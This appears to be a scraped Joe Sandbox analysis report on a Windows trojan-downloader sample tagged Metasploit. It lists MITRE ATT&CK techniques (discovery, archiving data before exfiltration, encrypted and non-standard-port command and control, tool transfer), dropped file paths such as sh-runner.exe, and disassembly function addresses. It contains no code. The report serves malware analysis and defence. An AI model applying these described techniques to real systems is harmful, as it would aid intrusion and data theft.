Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Metasploit

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\sh-runner.exe

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Function 00007FF71C8C1450 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125
networkCOMMON

Function 00007FF71C8C1180 Relevance: 10.6, APIs: 7, Instructions: 146
sleepstringCOMMON

Function 00007FF71C8C169C Relevance: 31.6, APIs: 6, Strings: 12, Instructions: 116
registrystringCOMMON

Function 00007FF71C8C2CC0 Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Function 00007FF71C8C1D70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232
COMMON

Function 00007FF71C8C2116 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Function 00007FF71C8C1B90 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138
COMMON

Function 00007FF71C8C2F00 Relevance: 7.8, APIs: 5, Instructions: 340
COMMON

Function 00007FF71C8C3430 Relevance: 6.2, APIs: 4, Instructions: 246
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre